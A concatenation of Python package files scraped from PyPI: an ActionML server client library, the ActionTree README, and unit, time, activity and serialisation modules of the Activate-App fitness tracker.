def _ok_response_handler(self, response):
return self._response_handler(httplib.OK, response)
class EventClient(BaseClient):
"""
Client for importing data into ActionML PIO Kappa Server.
:param url: the url of ActionML PIO Kappa Server.
:param threads: number of threads to handle ActionML API requests.
Must be >= 1.
:param qsize: the max size of the request queue (optional).
The asynchronous request becomes blocking once this size has been
reached, until the queued requests are handled.
Default value is 0, which means infinite queue size.
:param timeout: timeout for HTTP connection attempts and requests in
seconds (optional).
Default value is 5.
"""
def __init__(self, engine_id, url="http://localhost:9090", threads=1, qsize=0, timeout=5):
assert type(engine_id) is str, "engine_id must be string."
self.engine_id = engine_id
self.path = "/engines/%s/events" % (self.engine_id,)
super(EventClient, self).__init__(url, threads, qsize, timeout)
def async_create(self, event_id, event, entity_type, entity_id,
target_entity_type=None, target_entity_id=None, properties=None,
event_time=None, creation_time=None):
"""
Asynchronously create an event.
:param event_id:
:param event: event name. type str.
:param entity_type: entity type. It is the namespace of the entityId and
analogous to the table name of a relational database. The entityId must be
unique within same entityType. type str.
:param entity_id: entity id. *entity_type-entity_id* becomes the unique
identifier of the entity. For example, you may have entityType named user,
and different entity IDs, say 1 and 2. In this case, user-1 and user-2
uniquely identifies entities. type str
:param target_entity_type: target entity type. type str.
:param target_entity_id: target entity id. type str.
:param properties: a custom dict associated with an event. type dict.
:param event_time: the time of the event. type datetime, must contain
timezone info.
:param creation_time:
:returns:
AsyncRequest object. You can call the get_response() method using this
object to get the final results or status of this asynchronous request.
"""
data = {
"eventId": event_id,
"event": event,
"entityType": entity_type,
"entityId": entity_id,
}
if target_entity_type is not None:
data["targetEntityType"] = target_entity_type
if target_entity_id is not None:
data["targetEntityId"] = target_entity_id
if properties is not None:
data["properties"] = properties
data["eventTime"] = time_to_string_if_valid(event_time)
data["creationTime"] = time_to_string_if_valid(creation_time)
request = AsyncRequest("POST", self.path, **data)
request.set_response_handler(self._create_response_handler)
self._connection.make_request(request)
return request
def create(self, event_id, event, entity_type, entity_id,
target_entity_type = None, target_entity_id = None, properties = None,
event_time = None, creation_time = None):
"""Synchronously (blocking) create an event."""
return self.async_create(event_id, event, entity_type, entity_id,
target_entity_type, target_entity_id, properties,
event_time, creation_time).get_response()
def async_get(self, event_id):
"""
Asynchronously get an event from PIO Kappa Server.
:param event_id: event id returned by the EventServer when creating the event.
:returns: AsyncRequest object.
"""
request = AsyncRequest("GET", self._add_segment(event_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get(self, event_id):
"""Synchronouly get an event from PIO Kappa Server."""
return self.async_get(event_id).get_response()
def async_delete(self, event_id):
"""Asynchronouly delete an event from PIO Kappa Server.
:param event_id: event id returned by the EventServer when creating the
event.
:returns:
AsyncRequest object.
"""
request = AsyncRequest("DELETE", self._add_segment(event_id))
request.set_response_handler(self._delete_response_handler)
self._connection.make_request(request)
return request
def delete(self, event_id):
"""Synchronously delete an event from PIO Kappa Server."""
return self.async_delete(event_id).get_response()
class EngineClient(BaseClient):
def __init__(self, url="http://localhost:9090", threads=1, qsize=0, timeout=5):
self.path = "/engines"
super(EngineClient, self).__init__(url, threads, qsize, timeout)
def async_get(self, engine_id):
"""
Asynchronously get an engine info from PIO Kappa Server.
:param engine_id:
:returns: AsyncRequest object.
"""
request = AsyncRequest("GET", self._add_segment(self.path, engine_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get(self, engine_id):
return self.async_get(engine_id).get_response()
def async_create(self, data):
"""
Asynchronously create engine.
:param data:
:return:
"""
request = AsyncRequest("POST", self.path, **data)
request.set_response_handler(self._create_response_handler)
self._connection.make_request(request)
return request
def create(self, data):
return self.async_create(data).get_response()
def async_update(self, engine_id, data, data_delete=False, force=False):
"""
Asynchronously update engine.
:param force:
:param data_delete:
:param data:
:param engine_id:
:return:
"""
query = {}
if data_delete:
query['data_delete'] = True
if force:
query['force'] = True
path = self._add_segment(engine_id)
path = self._add_get_params(path, **query)
request = AsyncRequest("POST", path, **data)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def update(self, engine_id, data, data_delete=False, force=False):
return self.async_update(engine_id, data, data_delete, force).get_response()
def async_delete(self, engine_id):
request = AsyncRequest("DELETE", self._add_segment(engine_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def delete(self, engine_id):
return self.async_delete(engine_id).get_response()
class QueryClient(BaseClient):
"""
Client for extracting prediction results from an ActionML Engine
Instance.
:param url: the url of the ActionML Engine Instance.
:param threads: number of threads to handle ActionML API requests. Must be >= 1.
:param qsize: the max size of the request queue (optional).
The asynchronous request becomes blocking once this size has been
reached, until the queued requests are handled.
Default value is 0, which means infinite queue size.
:param timeout: timeout for HTTP connection attempts and requests in seconds (optional). Default value is 5.
"""
def __init__(self, engine_id, url = "http://localhost:9090", threads=1, qsize=0, timeout=5):
self.engine_id = engine_id
self.path = "/engines/{}/queries".format(self.engine_id)
super(QueryClient, self).__init__(url, threads, qsize, timeout)
def async_send_query(self, data):
"""
Asynchronously send a request to the engine instance with data as the query.
:param data: the query: It is converted to an json object using json.dumps method. type dict.
:returns:
AsyncRequest object. You can call the get_response() method using this
object to get the final results or status of this asynchronous request.
"""
request = AsyncRequest("POST", self.path, **data)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def send_query(self, data):
"""
Synchronously send a request.
:param data: the query: It is converted to an json object using json.dumps method. type dict.
:returns: the prediction.
"""
return self.async_send_query(data).get_response()
class CommandClient(BaseClient):
def __init__(self, url = "http://localhost:9090", threads=1, qsize=0, timeout=5):
self.path = "/commands"
super(CommandClient, self).__init__(url, threads, qsize, timeout)
def async_get_engines_list(self):
request = AsyncRequest("GET", self.path + "/list/engines")
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get_engines_list(self):
return self.async_get_engines_list().get_response()
def async_get_commands_list(self):
request = AsyncRequest("GET", self.path + "/list/commands")
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def get_commands_list(self):
return self.async_get_commands_list().get_response()
def async_run_command(self, engine_id):
data = {}
if engine_id is not None:
data['engine_id'] = engine_id
request = AsyncRequest("POST", self.path + "/batch-train", **data)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def run_command(self, engine_id):
return self.async_run_command(engine_id).get_response()
def async_check_command(self, command_id):
request = AsyncRequest("GET", self._add_segment(command_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def check_command(self, command_id):
return self.async_check_command(command_id).get_response()
def async_cancel_command(self, command_id):
request = AsyncRequest("DELETE", self._add_segment(command_id))
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
return request
def cancel_command(self, command_id):
return self.async_cancel_command(command_id).get_response() | ActionML | /ActionML-0.0.10.tar.gz/ActionML-0.0.10/actionml/__init__.py | __init__.py |
*ActionTree* is a Python (3.5+) library to execute (long) actions in parallel, respecting dependencies between those actions.
You create a dependency graph of actions to be executed and then call the ``execute`` function on its root.
It's licensed under the `MIT license <http://choosealicense.com/licenses/mit/>`_.
It's available on the `Python package index <http://pypi.python.org/pypi/ActionTree>`_.
Its `documentation <http://jacquev6.github.io/ActionTree>`_
and its `source code <https://github.com/jacquev6/ActionTree>`_ are on GitHub.
Questions? Remarks? Bugs? Want to contribute? `Open an issue <https://github.com/jacquev6/ActionTree/issues>`_!
.. image:: https://img.shields.io/github/workflow/status/jacquev6/ActionTree/Continuous%20Integration?label=CI&logo=github
:target: https://github.com/jacquev6/ActionTree/actions?query=workflow%3A%22Continuous+Integration%22
.. image:: https://img.shields.io/pypi/v/ActionTree?logo=pypi
:alt: PyPI
:target: https://pypi.org/project/ActionTree/
.. image:: https://img.shields.io/pypi/pyversions/ActionTree?logo=pypi
:alt: PyPI
:target: https://pypi.org/project/ActionTree/
Quick start
===========
Install from PyPI::
$ pip install ActionTree
With dependencies to create Gantt charts and dependency graphs::
$ pip install 'ActionTree[dependency_graphs,gantt]'
Import:
>>> from ActionTree import execute
>>> from ActionTree.stock import CallSubprocess
Execute some action:
>>> link = CallSubprocess(["g++", "a.o", "b.o", "-o", "test"])
>>> link.add_dependency(CallSubprocess(["g++", "-c", "a.cpp", "-o", "a.o"]))
>>> link.add_dependency(CallSubprocess(["g++", "-c", "b.cpp", "-o", "b.o"]))
>>> report = execute(link)
And verify everything went well:
>>> report.is_success
True
>>> os.path.isfile("test")
True
| ActionTree | /ActionTree-0.13.2.tar.gz/ActionTree-0.13.2/README.rst | README.rst |
import shutil
from dataclasses import dataclass
from datetime import datetime
from typing import Optional
from uuid import UUID, uuid4
from activate import serialise
from activate import track as track_
from activate.units import DimensionValue
def from_track(name, sport, track, filename):
return Activity(name, sport, track, filename)
def none_default(value, default):
"""Return default if value is None else value."""
return default if value is None else value
@dataclass(init=False)
class Activity:
name: str
sport: str
track: track_.Track
original_name: str
flags: dict
effort_level: int
start_time: datetime
distance: float
activity_id: UUID
description: str
photos: list
server: Optional[str]
username: Optional[str]
def __init__(
self,
name,
sport,
track,
original_name,
flags=None,
effort_level=None,
start_time=None,
distance=None,
activity_id=None,
description="",
photos=None,
server=None,
username=None,
):
self.name = name
self.sport = sport
if isinstance(track, dict):
if "manual" in track:
del track["manual"]
self.track = track_.ManualTrack(**track)
else:
self.track = track_.Track(track)
else:
self.track = track
self.original_name = original_name
self.server = server
self.username = username
self.flags = none_default(flags, {})
self.effort_level = effort_level
self.start_time = none_default(start_time, self.track.start_time)
self.distance = none_default(distance, self.track.length)
self.activity_id = none_default(activity_id, uuid4())
self.description = description
self.photos = none_default(photos, [])
@property
def stats(self):
result = {}
result["Distance"] = DimensionValue(self.distance, "distance")
result["Elapsed Time"] = DimensionValue(self.track.elapsed_time, "time")
if not self.track.manual and self.track.moving_time < self.track.elapsed_time:
result["Moving Time"] = DimensionValue(self.track.moving_time, "time")
if self.track.has_altitude_data:
result["Ascent"] = DimensionValue(self.track.ascent, "altitude")
result["Descent"] = DimensionValue(self.track.descent, "altitude")
average_speed = self.track.average("speed")
if average_speed > 0:
if not self.track.manual:
average_speed_moving = self.track.average_speed_moving
if average_speed_moving / average_speed < 1.01:
average_speed_moving = None
else:
average_speed_moving = None
result["Average Speed"] = DimensionValue(average_speed, "speed")
if average_speed_moving is not None:
result["Mov. Av. Speed"] = DimensionValue(average_speed_moving, "speed")
result["Pace"] = DimensionValue(1 / average_speed, "pace")
if average_speed_moving is not None:
result["Pace (mov.)"] = DimensionValue(1 / average_speed_moving, "pace")
if not self.track.manual:
result["Max. Speed"] = DimensionValue(self.track.maximum("speed"), "speed")
if self.track.has_altitude_data:
result["Highest Point"] = DimensionValue(
self.track.maximum("ele"), "altitude"
)
if "heartrate" in self.track:
result["Average HR"] = DimensionValue(
self.track.average("heartrate"), "heartrate"
)
if "cadence" in self.track:
result["Avg. Cadence"] = DimensionValue(
self.track.average("cadence"), "cadence"
)
if "power" in self.track:
result["Average Power"] = DimensionValue(
self.track.average("power"), "power"
)
result["Max. Power"] = DimensionValue(self.track.maximum("power"), "power")
return result
@property
def active_flags(self):
return [k for k, v in self.flags.items() if v]
def unload(self, unloaded_class):
return unloaded_class(
self.name,
self.sport,
self.flags,
self.effort_level,
self.start_time,
self.distance,
self.track.elapsed_time,
self.track.ascent,
self.activity_id,
self.server,
self.username,
)
@property
def save_data(self):
return {
"name": self.name,
"sport": self.sport,
"track": self.track.save_data,
"original_name": self.original_name,
"flags": self.flags,
"effort_level": self.effort_level,
"start_time": self.start_time,
"distance": self.distance,
"activity_id": self.activity_id,
"description": self.description,
"photos": self.photos,
"server": self.server,
"username": self.username,
}
def save(self, path):
serialise.dump(self.save_data, path / f"{self.activity_id}.json.gz", gz=True)
def export_original(self, filename):
shutil.copy2(self.original_name, filename) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/activity.py | activity.py |
import math
from datetime import timedelta
from activate import times
def as_int(value) -> str:
"""Format a value as an integer, ready to display."""
return str(round(value))
def maybe_as_int(value) -> str:
"""
Format a value as an integer if it is one.
Any very close value will be formatted as an integer to avoid
floating-point errors.
"""
if math.isclose(value, round(value)):
return as_int(value)
return str(value)
def info_format(entry: str):
"""Format an value for the info box."""
if entry in {"Average Speed", "Mov. Av. Speed", "Distance"}:
return "{:.2f}".format
if entry in {"Max. Speed", "Average Power", "Average HR", "Avg. Cadence"}:
return "{:.1f}".format
if entry in {"Ascent", "Descent", "Highest Point", "Max. Power"}:
return as_int
if entry in {"Elapsed Time", "Moving Time", "Pace", "Pace (mov.)"}:
return times.to_string
if entry is None:
return lambda x: x
raise ValueError(f"Unknown entry: {entry}")
def split_format(entry: str):
"""Format a value for the splits table."""
if entry == "Number":
return as_int
if entry in {"Time", "Split"}:
return times.to_string
if entry in {"Net Climb", "Ascent"}:
return as_int
if entry == "Speed":
return "{:.2f}".format
raise ValueError(f"Unknown entry: {entry}")
def list_format(entry: str):
"""Format a value for the splits table."""
if entry in {"Name", "Type", "Server", "User"}:
return None
if entry == "Distance":
return "{:.2f}".format
if entry == "Start Time":
return lambda value: str(times.round_time(value))
raise ValueError(f"Unknown entry: {entry}")
def default_as_string(value) -> str:
"""
Round a value in a sensible way.
Always shows at least the nearest integer. Any extra precision is
limited to the lesser of two decimal places, or three significant
figures. Also formats timedeltas nicely.
"""
if isinstance(value, tuple):
suffix = " " + value[1]
value = value[0]
else:
suffix = ""
if isinstance(value, timedelta):
return times.to_string(value)
if value >= 100:
return as_int(value) + suffix
if value >= 10:
return str(round(value, 1)) + suffix
return str(round(value, 2)) + suffix | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/number_formats.py | number_formats.py |
import math
from dataclasses import dataclass
from datetime import timedelta
from functools import wraps
from typing import Union
class DimensionError(Exception):
pass
def compatible_dimensions(function):
@wraps(function)
def wrapper(var1, var2, **kwargs):
if var1.dimension != var2.dimension:
raise DimensionError(
f"incompatible dimensions: {var1.dimension} and {var2.dimension}"
)
return function(var1, var2, **kwargs)
return wrapper
@dataclass(frozen=True)
class DimensionValue:
"""A value with a dimension attached."""
value: Union[float, timedelta]
dimension: str
def format(self, unit_system):
return unit_system.format(self.value, self.dimension)
def encode(self, unit_system):
return unit_system.encode(self.value, self.dimension)
@compatible_dimensions
def __lt__(self, other):
return self.value < other.value
@compatible_dimensions
def __gt__(self, other):
return self.value > other.value
@compatible_dimensions
def __eq__(self, other):
return self.value == other.value
@compatible_dimensions
def __ne__(self, other):
return self.value != other.value
@compatible_dimensions
def __le__(self, other):
return self.value <= other.value
@compatible_dimensions
def __ge__(self, other):
return self.value >= other.value
@compatible_dimensions
def __add__(self, other):
return DimensionValue(self.value + other.value, self.dimension)
@compatible_dimensions
def __sub__(self, other):
return DimensionValue(self.value - other.value, self.dimension)
def __neg__(self):
return DimensionValue(-self.value, self.dimension)
@dataclass
class Unit:
name: str
symbol: str
size: float
def encode(self, value):
return value / self.size
def decode(self, value):
return value * self.size
def format(self, value):
return (self.encode(value), self.symbol)
def __truediv__(self, other):
return Unit(
f"{self.name} per {other.name}",
f"{self.symbol} ∕ {other.symbol}",
self.size / other.size,
)
def __mul__(self, other):
return Unit(
f"{self.name} {other.name}",
f"{self.symbol} {other.symbol}",
self.size * other.size,
)
@dataclass
class UnitConfig:
"""The current preferred unit system."""
units: dict
def encode(self, value, dimension):
return self.units[dimension].encode(value)
def decode(self, value, dimension):
return self.units[dimension].decode(value)
def format(self, value, dimension):
return self.units[dimension].format(value)
def format_name_unit(self, dimension, symbol=None, name=None) -> str:
"""
Get 'Distance (m)' or similar string.
Returns the dimension if it isn't recognised.
"""
if symbol is None:
if dimension not in self.units:
return dimension
symbol = self.units[dimension].symbol
if symbol:
return f"{dimension.title() if name is None else name} ({symbol})"
return dimension.title()
class PaceUnit(Unit):
"""A unit of pace (1 / speed), such as 4:00 kilometres."""
def __init__(self, distance: Unit):
self.distance = distance
self.name = f"minutes per {distance.name}"
self.size = 1 / distance.size
self.symbol = "∕ " + distance.symbol
def encode(self, value) -> timedelta:
return timedelta(seconds=super().encode(value))
def __repr__(self):
return f"{self.__class__.__qualname__}({self.distance!r})"
class DateUnit(Unit):
"""A unit giving a date."""
def __init__(self):
super().__init__("date", "", 1)
def encode(self, value):
return value.timestamp()
def format(self, value):
return str(value)
KM = Unit("kilometre", "km", 1000)
MILE = Unit("mile", "mi", 1609.344)
METRE = Unit("metre", "m", 1)
FOOT = Unit("foot", "ft", 0.3048)
YARD = Unit("yard", "yd", 0.9144)
SECOND = Unit("second", "s", 1)
MINUTE = Unit("minute", "min", 60)
HOUR = Unit("hour", "h", 3600)
METRE_PER_SECOND = METRE / SECOND
KM_PER_HOUR = KM / HOUR
MILE_PER_HOUR = MILE / HOUR
MILE_PER_HOUR.symbol = "mph"
FOOT_PER_MINUTE = FOOT / MINUTE
METRE_PER_MINUTE = METRE / MINUTE
TIME = Unit("minutes and seconds", "", 1)
MIN_PER_KM = PaceUnit(KM)
MIN_PER_MILE = PaceUnit(MILE)
BEAT_PER_MINUTE = Unit("beat per minute", "bpm", 1 / 60)
CYCLES_PER_MINUTE = Unit("cycles per minute", "rpm", 1 / 60)
HERTZ = Unit("hertz", "Hz", 1)
WATT = Unit("watt", "W", 1)
HORSE_POWER = Unit("horsepower", "hp", 745.6998715822702)
DEGREE = Unit("degree", "°", math.tau / 360)
RADIAN = Unit("radian", "", 1)
UNITLESS = Unit("", "", 1)
DATE = DateUnit()
ALL = {
"distance": (METRE, FOOT, YARD, KM, MILE),
"altitude": (METRE, FOOT),
"speed": (METRE_PER_SECOND, KM_PER_HOUR, MILE_PER_HOUR, METRE_PER_MINUTE),
"vertical_speed": (METRE_PER_SECOND, METRE_PER_MINUTE, FOOT_PER_MINUTE),
"real_time": (SECOND, MINUTE, HOUR),
"time": (TIME,),
"pace": (MIN_PER_KM, MIN_PER_MILE),
"date": (DATE,),
"heartrate": (BEAT_PER_MINUTE,),
"cadence": (CYCLES_PER_MINUTE,),
"power": (WATT,),
"angle": (DEGREE,),
None: (UNITLESS,),
}
METRIC = {
"distance": KM,
"altitude": METRE,
"speed": KM_PER_HOUR,
"vertical_speed": METRE_PER_MINUTE,
"real_time": MINUTE,
"time": TIME,
"pace": MIN_PER_KM,
"date": DATE,
"heartrate": BEAT_PER_MINUTE,
"cadence": CYCLES_PER_MINUTE,
"power": WATT,
"angle": DEGREE,
None: UNITLESS,
}
IMPERIAL = {
"distance": MILE,
"altitude": FOOT,
"speed": MILE_PER_HOUR,
"vertical_speed": FOOT_PER_MINUTE,
"real_time": MINUTE,
"time": TIME,
"pace": MIN_PER_MILE,
"date": DATE,
"heartrate": BEAT_PER_MINUTE,
"cadence": CYCLES_PER_MINUTE,
"power": HORSE_POWER,
"angle": DEGREE,
None: UNITLESS,
}
DEFAULT = "Metric"
UNIT_SYSTEMS = {"Metric": UnitConfig(METRIC), "Imperial": UnitConfig(IMPERIAL)}
UNIT_NAMES = {
u.name: u
for u in (
KM,
MILE,
METRE,
FOOT,
YARD,
SECOND,
MINUTE,
HOUR,
METRE_PER_SECOND,
KM_PER_HOUR,
MILE_PER_HOUR,
FOOT_PER_MINUTE,
METRE_PER_MINUTE,
TIME,
MIN_PER_KM,
MIN_PER_MILE,
BEAT_PER_MINUTE,
CYCLES_PER_MINUTE,
HERTZ,
WATT,
HORSE_POWER,
DEGREE,
RADIAN,
UNITLESS,
DATE,
)
} | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/units.py | units.py |
from datetime import datetime, timedelta
ONE_WEEK = timedelta(days=7)
ONE_DAY = timedelta(days=1)
ONE_HOUR = timedelta(hours=1)
ONE_MINUTE = timedelta(minutes=1)
EPOCH = datetime.fromtimestamp(0) + timedelta(365 * 3 + 1)
MONTHS = (
"January",
"February",
"March",
"April",
"May",
"June",
"July",
"August",
"September",
"October",
"November",
"December",
)
def from_GPX(string):
"""Load a time from a string in GPX format."""
if string is None:
return None
return datetime.fromisoformat(string.rstrip("Z"))
def to_string(time: timedelta, exact=False):
"""Convert a time to a nicely formatted string."""
result = []
started = False
if time.days:
result += [str(time.days), " d "]
time %= ONE_DAY
started = True
if time >= ONE_HOUR or started:
result += [f"{time // ONE_HOUR:0>2d}", ":"]
time %= ONE_HOUR
started = True
if time >= ONE_MINUTE or started:
result += [f"{time // ONE_MINUTE:0>2d}", ":"]
time %= ONE_MINUTE
secs = time.total_seconds()
if int(secs) == secs or not exact:
secs = int(secs)
result.append(f"{secs:0>2d}")
else:
result.append(f"{secs:0>.2f}")
# Only seconds
if len(result) == 1:
result.append(" s")
return "".join(result).lstrip("0").strip()
def nice(time: datetime):
"""Format a time on two lines neatly."""
return time.strftime("%A %d %B %Y\n%H:%M")
def round_time(time: datetime) -> datetime:
"""Round a time to the nearest second."""
new = time - timedelta(microseconds=time.microsecond)
return new + timedelta(seconds=1) if time.microsecond >= 500000 else new
def to_number(value):
"""Convert a timedelta to seconds, leaving other values untouched."""
if isinstance(value, timedelta):
return value.total_seconds()
return value
def back_name(base, period: str, number=0):
"""Get the name of a year, month or week number back."""
if period == "year":
return str(base.year - number)
if period == "month":
return MONTHS[(base.month - number - 1) % 12]
if period == "week":
date = base.date() - number * ONE_WEEK - timedelta(days=base.weekday())
return f"w/c {date:%d %b}"
if period == "day":
return str((base - ONE_DAY * number).day)
if period == "weekday":
return f"{base - ONE_DAY * number:%A}"
raise ValueError('period must be "year", "month" or "week"')
def period_difference(base, other, period: str) -> int:
"""
Determine the number of years/months/weeks between other and base.
Returns 0 if they are in the same week, 1 if other is in the
previous week etc.
"""
if period == "year":
return base.year - other.year
if period == "month":
return base.month - other.month + (base.year - other.year) * 12
if period == "week":
value = (base.date() - other.date()).days // 7
if other.weekday() > base.weekday():
value += 1
return value
if "day" in period:
return (base.date() - other.date()).days
raise ValueError('period must be "year", "month" or "week"')
def since_start(base, period: str) -> timedelta:
"""Return the time since the start of the current period."""
return base - start_of(base, period)
def start_of(base, period: str) -> datetime:
"""Get the start of the current period."""
if period == "year":
return datetime(year=base.year, month=1, day=1)
if period == "month":
return datetime(year=base.year, month=base.month, day=1)
if period == "week":
return (
datetime(year=base.year, month=base.month, day=base.day)
- base.weekday() * ONE_DAY
)
if "day" in period:
return datetime(year=base.year, month=base.month, day=base.day)
raise ValueError('period must be "year", "month", "week" or "day"')
def end_of(base, period: str) -> datetime:
"""Get the end of the current period."""
if period == "year":
return start_of(base.replace(year=base.year + 1), period)
if period == "month":
if base.month == 12:
return start_of(base.replace(year=base.year + 1, month=1), period)
return start_of(base.replace(month=base.month + 1), period)
if period == "week":
return start_of(base + ONE_WEEK, period)
if "day" in period:
return start_of(base + ONE_DAY, period)
raise ValueError('period must be "year", "month" or "week"')
def hours_minutes_seconds(time: timedelta) -> tuple:
hours, seconds = divmod(time.total_seconds(), 3600)
return (hours, *divmod(seconds, 60))
def get_periods(minimum, maximum, period: str) -> list:
"""
Get the periods between minimum and maximum (exclusive).
Returns a list of (end datetime, name) tuples.
"""
current = end_of(minimum, period)
periods = [(current, back_name(current, period, 1))]
while current <= end_of(maximum, period):
current = end_of(current, period)
periods.append((current, back_name(current, period, 1)))
return periods | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/times.py | times.py |
from pathlib import Path
from activate import activity, files, filetypes, track
ACTIVITY_TYPE_NAMES = {
"run": "Run",
"running": "Run",
"ride": "Ride",
"cycling": "Ride",
"biking": "Ride",
"walk": "Walk",
"walking": "Walk",
"hiking": "Walk",
"ski": "Ski",
"alpine_skiing": "Ski",
"swim": "Swim",
"swimming": "Swim",
"row": "Row",
"rowing": "Row",
"1": "Ride",
"2": "Ski",
"9": "Run",
"10": "Walk",
"16": "Swim",
"23": "Row",
}
def convert_activity_type(activity_type: str, name) -> str:
"""Get the correct activity type from a raw one or by inference."""
activity_type = activity_type.casefold()
if activity_type in ACTIVITY_TYPE_NAMES:
return ACTIVITY_TYPE_NAMES[activity_type]
if activity_type in {"unknown", "generic"}:
# Infer activity type from name
for activity_type_name in ACTIVITY_TYPE_NAMES:
if activity_type_name.isnumeric():
continue
if name is not None and activity_type_name in name.casefold():
return ACTIVITY_TYPE_NAMES[activity_type_name]
return "Other"
def default_name(filename: Path):
"""Generate a default activity name from a file name."""
return files.decode_name(filename.stem.split(".")[0])
def load(filename: Path) -> dict:
"""
Get {"name": name, "sport": sport, "track": Track} by loading a file.
Uses the appropriate track loader from the filetypes module.
"""
filetype = (
filename.with_suffix("").suffix
if filename.suffix.casefold() == ".gz"
else filename.suffix
).casefold()
data = {".gpx": filetypes.gpx, ".fit": filetypes.fit, ".tcx": filetypes.tcx}[
filetype
].load(filename)
return {
"name": data[0] if data[0] is not None else default_name(filename),
"sport": convert_activity_type(data[1], data[0]),
"track": track.Track(data[2]),
}
def import_and_load(filename, copy_to) -> activity.Activity:
"""Import an activity and copy it into the originals directory."""
filename = files.copy_to_location_renamed(filename, copy_to)
return activity.from_track(**load(filename), filename=filename) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/load_activity.py | load_activity.py |
from activate import units
MARATHON = 42195
# The distances shown in the Curve page
SPECIAL_DISTANCES = {
"Run": {
60: "60 m",
100: "100 m",
200: "200 m",
400: "400 m",
500: "500 m",
800: "800 m",
1000: "1000 m",
1500: "1500 m",
units.MILE.decode(1): "1 mile",
2000: "2 km",
3000: "3 km",
units.MILE.decode(2): "2 mile",
5000: "5 km",
units.MILE.decode(5): "5 mile",
10000: "10 km",
15000: "15 km",
units.MILE.decode(10): "10 mile",
20000: "20 km",
MARATHON / 2: "half marathon",
MARATHON: "marathon",
50000: "50 km",
100000: "100 km",
},
"Ride": {
100: "100 m",
200: "200 m",
500: "500 m",
1000: "1 km",
2000: "2 km",
3000: "3 km",
4000: "4 km",
5000: "5 km",
10000: "10 km",
15000: "15 km",
20000: "20 km",
25000: "25 km",
30000: "30 km",
40000: "40 km",
50000: "50 km",
75000: "75 km",
100000: "100 km",
150000: "150 km",
200000: "200 km",
250000: "250 km",
300000: "300 km",
400000: "400 km",
500000: "500 km",
1000000: "1000 km",
},
"Swim": {
25: "25 m",
50: "50 m",
75: "75 m",
100: "100 m",
150: "150 m",
200: "200 m",
300: "300 m",
400: "400 m",
500: "500 m",
800: "800 m",
1000: "1000 m",
1500: "1500 m",
units.MILE.decode(1): "1 mile",
2000: "2 km",
3000: "3 km",
units.MILE.decode(2): "2 mile",
5000: "5 km",
10000: "10 km",
},
"Walk": {
50: "50 m",
100: "100 m",
200: "200 m",
500: "500 m",
1000: "1000 m",
units.MILE.decode(1): "1 mile",
2000: "2 km",
units.MILE.decode(2): "2 mile",
5000: "5 km",
units.MILE.decode(5): "5 mile",
10000: "10 km",
15000: "15 km",
units.MILE.decode(10): "10 mile",
20000: "20 km",
units.MILE.decode(20): "20 mile",
50000: "50 km",
units.MILE.decode(50): "50 mile",
100000: "100 km",
150000: "150 km",
units.MILE.decode(100): "100 mile",
200000: "200 km",
},
None: {
10: "10 m",
20: "20 m",
50: "50 m",
100: "100 m",
200: "200 m",
500: "500 m",
1000: "1 km",
2000: "2 km",
5000: "5 km",
10000: "10 km",
20000: "20 km",
50000: "50 km",
100000: "100 km",
200000: "200 km",
500000: "500 km",
1000000: "1000 km",
},
}
# The boundaries of the zones
ZONES = {
"Run": list(range(21)) + [float("inf")],
"Ride": list(range(0, 62, 2)) + [float("inf")],
"Swim": [x / 2 for x in range(13)] + [float("inf")],
"Walk": [x / 2 for x in range(21)] + [float("inf")],
None: list(range(21)) + [float("inf")],
}
TYPES = ("Run", "Ride", "Swim", "Walk", "Ski", "Row", "Other")
FLAGS = {
"Run": ("Race", "Long Run", "Workout", "Treadmill"),
"Ride": ("Race", "Workout"),
} | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/activity_types.py | activity_types.py |
import gzip
import json
import uuid
from datetime import datetime, timedelta
from pathlib import Path
def default(obj):
"""
Turn datetimes and timedeltas into JSON.
>>> default(datetime(2000, 1, 2, 12, 30, 42))
{'__DATETIME': '2000-01-02T12:30:42'}
>>> default(timedelta(minutes=1, seconds=40))
{'__TIMEDELTA': 100.0}
"""
if isinstance(obj, datetime):
return {"__DATETIME": obj.isoformat()}
if isinstance(obj, timedelta):
return {"__TIMEDELTA": obj.total_seconds()}
if isinstance(obj, uuid.UUID):
return {"__ID": str(obj)}
if isinstance(obj, Path):
return {"__PATH": str(obj)}
raise TypeError(f"Cannot serialise {obj.__class__.__qualname__}")
DECODE_KEYS = {
"__DATETIME": datetime.fromisoformat,
"__TIMEDELTA": lambda v: timedelta(seconds=v),
"__ID": uuid.UUID,
"__PATH": Path,
}
def decode(obj):
"""Undo encoding done by default."""
if len(obj) != 1:
return obj
key, value = obj.popitem()
try:
return DECODE_KEYS[key](value)
except KeyError:
return {key: value}
def dumps(obj, readable=False):
"""Convert an object to a JSON string."""
return json.dumps(
obj,
default=default,
separators=None if readable else (",", ":"),
indent="\t" if readable else None,
)
def dump_bytes(obj, gz=False, readable=False):
"""Convert an object to data."""
data = dumps(obj, readable=readable).encode("utf-8")
return gzip.compress(data) if gz else data
def loads(data, gz=False):
"""Load an object from a string or bytes."""
data = gzip.decompress(data) if gz else data
return json.loads(data, object_hook=decode)
def dump(obj, filename, *args, **kwargs):
"""
Save obj as a JSON file. Can store datetimes and timedeltas.
Can be gzipped if gz is True.
"""
with open(filename, "wb") as f:
f.write(dump_bytes(obj, *args, **kwargs))
def load(filename: Path, gz="auto"):
"""Load a JSON file. Can retrieve datetimes and timedeltas."""
if gz == "auto":
gz = filename.suffix.casefold() == ".gz"
with (gzip.open if gz else open)(filename, "rt") as f:
return json.load(f, object_hook=decode) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/serialise.py | serialise.py |
import dataclasses
import datetime
from collections import Counter
from typing import Optional
from activate import activity, serialise, times, units
